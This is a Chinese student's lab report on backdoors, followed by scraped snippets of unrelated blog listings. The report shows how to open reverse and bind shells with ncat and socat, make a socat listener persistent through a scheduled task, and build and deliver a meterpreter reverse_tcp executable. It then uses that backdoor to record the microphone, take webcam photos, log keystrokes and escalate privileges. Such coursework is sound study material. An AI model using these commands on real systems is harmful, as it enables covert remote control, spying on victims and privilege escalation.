关键词:
2019-2020-2 20175305张天钰《网络对抗技术》 Exp2 后门原理与实践
知识点概括
后门:
不经过正常认证流程而访问系统的通道。
后门类型:
编译器留后门
操作系统留后门
应用程序中留后门
潜伏于操作系统中或伪装为特定应用的专用后门程序。
后门工具:
netcat:又名nc或ncat,是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
soCat:Netcat++,超级netcat工具。
任何代理、转发等功能都可以用该工具实现。
meterpreter:是一个后门平台。其中有大量零件可调参数,用时组合可以生成可执行文件。
后门启动:
任务计划程序——>新建任务计划——>触发器——>操作程序或脚本——>操作添加参数。
实验步骤
任务一 :使用netcat获取主机操作Shell,cron启动
(1)Linux获得Win Shell
输入ifconfig查看到kali的IP地址:
输入nc -l -p 5305在Linux运行监听
在ncat文件目录下输入ncat.exe -e cmd.exe
192.168.0.104 5305,使Windows反弹连接Linux
kali成功获得Windows的Shell:
(2)Windows获取Linux Shell
输入ipconfig查看本机的IP地址:
输入nc -l -p 5305在Linux运行监听
输入ncat.exe -e cmd.exe 192.168.10.128 5305Widows开始连接Kali运行cmd.exe
Windows成功获取Kali的Shell:
任务二:使用socat获取主机操作Shell,任务计划启动
下载socat
打开计算机管理,在任务计划程序中创建任务,填写任务名称。
新建操作,程序或脚本选择socat.exe,添加参数填写tcp-listen:5305 exec:cmd.exe,pty,stderr,把cmd.exe绑定到端口5305,同时把cmd.exe的stderr重定向到stdout上:
在Linux端输入socat-tcp:192.168.10.128:5305。完成连接,获得windows shell:
任务三:使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=5305 -f exe > 20175305_backdoor.exe
IP地址为控制端IP,即Linux的IP
生成了后门程序:20175305_backdoor.exe
通过ncat.exe -lv 5305 > 20175305_backdoor.exe指令将被控制主机进入接受文件模式
在Linux中执行nc 192.168.0.104 5305 < 20175305_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP
传送接收文件成功
在Kali上使用msfconsole指令进入msf控制台
输入use exploit/multi/handler使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload
set LHOST 192.168.10.128,这里用的是LinuxIP,和生成后门程序时指定的IP相同
set LPORT 5305,同样要使用相同的端口
设置完成后,执行监听exploit
运行Windows下的后门程序20175305_backdoor.exe
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
任务四:使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.输入record_mic 指令可以截获一段时长的音频,录制完毕自动输出保存路径:
2.输入webcam_snap指令可以使用摄像头进行拍照,拍摄完毕自动输出保存路径,并自动打开图像
3.输入使用keyscan_start和keyscan_dump指令获取目标机击键记录:
4.输入screenshot指令可以进行截屏
5.输入getsystem指令进行提权操作:
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
下载不是正规途径的文件
(2)例举你知道的后门如何启动起来(win及linux)的方式?
程序自启动;开机自启动;
(3)Meterpreter有哪些给你映像深刻的功能?
各个功能太完备了,想到黑客有可能获取这些,感到非常可怕,摄像头录音等
(4)如何发现自己有系统有没有被安装后门?
灵活使用防火墙和杀毒软件,查找不明文件来源
实验体会
本次实验使我对这门课进一步认识,本次实验内容并不难,通过学习视频资料就可以做,但是这次实验给我增加了浓厚的兴趣,后门这块内容知识十分有趣,倒不如说计算机真的神奇,还有什么比进一步学习网络对抗技术,学习计算机更神秘呢。
20175305张天钰实现mypwd
1.命令格式:pwd[选项]--help:显示帮助信息;--version:显示版本信息。2.命令功能:查看”当前工作目录“的完整路径3.常用参数:一般情况下不带任何参数如果目录是链接时:格式:pwd-P显示出实际路径,而非使用连接(link... 查看详情
20175305张天钰第四周学习总结(代码片段)
**第四周学习总结**第六章继承与多态本章主要学习了有关继承与多态的一些概念和内容。继承就是面向对象中,子类继承父类,避免重复的行为定义。重复再程序设计上是非常不好的信号,因为其大大增加了修改维护程序的成... 查看详情
20175305张天钰《java程序设计》第四周课下测试总结(代码片段)
第四周课下测试总结错题某方法在父类的访问权限是public,则子类重写时级别可以是protected。A.trueB.false正确答案:B解析:书P122:子类不允许降低方法的访问权限,但可以提高访问权限。复杂题(易错)下列关于final关键字的说... 查看详情
张天爱盖报纸睡机场为新片连续工作3天无休
《父子雄兵》张天爱大鹏剧照张天爱航班延误滞留睡机场腾讯娱乐讯7月16日凌晨,刚刚结束《父子雄兵》路演的张天爱由于天气原因滞留成都机场一夜,一夜未休息的状态下,她仍然按原定计划工作,还暖心劝粉丝别接机,... 查看详情
《搜索结果网络搜索结果蚂蚁金服张天翼蚂蚁金服智能风控引擎alpharisk介绍》
http://myslide.cdn.myslide.cn/lv74v-nyef3x_ESM0yprkUzahKe2?attname=%E8%9A%82%E8%9A%81%E9%87%91%E6%9C%8D+%E5%BC%A0%E5%A4%A9%E7%BF%BC+%E8%9A%82%E8%9A%81%E9%87%91%E6%9C%8D%E6%99%BA%E8%83%BD%E9%A3%8E%E6%8E%A7%E5%BC%95%E6%93%8EAlphaRisk%E4%BB%8B%E7%BB%8D_myslide.cn_.pdf&e=1588392611&t... 查看详情
尚硅谷张天禹老师vue2笔记(方便自己查阅)(代码片段)
视频链接:文章目录尚硅谷张天禹老师vue2笔记脚手架文件结构关于不同版本的Vuevue.config.js配置文件ref属性props配置项mixin(混入)插件scoped样式总结TodoList案例webStorage组件的自定义事件全局事件总线(GlobalEventBus)消息... 查看详情
尚硅谷张天禹老师vue2笔记(方便自己查阅)(代码片段)
视频链接:文章目录尚硅谷张天禹老师vue2笔记脚手架文件结构关于不同版本的Vuevue.config.js配置文件ref属性props配置项mixin(混入)插件scoped样式总结TodoList案例webStorage组件的自定义事件全局事件总线(GlobalEventBus)消息... 查看详情
团队作业成绩分配
团队作业一:7.5分成员孙健张天舒李良伟孙悦姜懿芙分数7.58787 团队作业二:6.5分成员孙健张天舒李良伟孙悦姜懿芙分数6.56.57.566 查看详情
vue2笔记尚硅谷张天禹(代码片段)
笔记脚手架文件结构├──node_modules├──public│├──favicon.ico:页签图标│└──index.html:主页面├──src│├──assets:存放静态资源││└──logo.png││──component:存放组件││└──HelloWorld.vue││──App.vue:汇总所有... 查看详情
vue3笔记尚硅谷张天禹(代码片段)
Vue3快速上手1.Vue3简介2020年9月18日,Vue.js发布3.0版本,代号:OnePiece(海贼王)耗时2年多、2600+次提交、30+个RFC、600+次PR、99位贡献者github上的tags地址:https://github.com/vuejs/vue-next/releases/tag/v3.0.02.Vue3... 查看详情
团队作业
...团队成员队长:孙健分工:策划、安卓端、网页端队员:张天舒 分工:策划、调研、美工 孙悦 分工:策划、调研、美工 李良伟分工:安卓端、网页端 姜... 查看详情
团队作业
...团队成员队长:孙健分工:策划、安卓端、网页端队员:张天舒 分工:策划、调研、美工 孙悦 分工:策划、调研、美工 李良伟分工:安卓端、网页端 姜... 查看详情
团队作业1
...团队成员队长:孙健分工:策划、安卓端、网页端队员:张天舒 分工:策划、调研、美工 孙悦 分工:策划、调研、美工 李良伟分工:安卓端、网页端 姜... 查看详情
学霸笔记
...开发模式。二.团队成员:队长:蒲雪冰队员:郝志荣、张天齐、陈卓三.团队题目:学霸的笔记(1)背景:作为一名大三老油条,大学课堂三年,课程任务越来越繁重,尤其当前授课较快,笔记速度跟不上老师讲课速度(还有许多... 查看详情
软件工程作业no.4
软件工程第四次作业(第一次结♂对作业)队友选择:张天齐(153401010113)队友代码:cooooding一、作业要求首先在同学中找一个同伴,范围不限,可以在1~5班中随意组合,建议尽量不要找同组的成员,女同学尽量找男同学结对,... 查看详情
【转载】通过iptables实现端口转发和内网共享上网
参考技术A【出处】http://blog.51cto.com/wwdhks/1154032【作者】张天成,zhangtiancheng@gmail.comiptables操作的是2.4以上内核的netfilter,所以需要linux的内核在2.4以上。其功能与安全性远远比其前辈ipfwadm,ipchains强大,iptables大致是工作在OSI七层... 查看详情
第二次结对作业(代码片段)
...力选做,以完成上述功能为主)2、角色的分配驾驶员:张天齐??能够 查看详情
《在你彷徨时候,总有人在前行》
...着眼泪,忍着疼痛,淌着汗水,奋力向前跑。——张天怡价值观——职业的探索也不可能一帆风顺,先别说你的白日梦不可能实现,就是你现在努力的方向也很有可能不是你最终要去的方向。乔布斯“追随我心,... 查看详情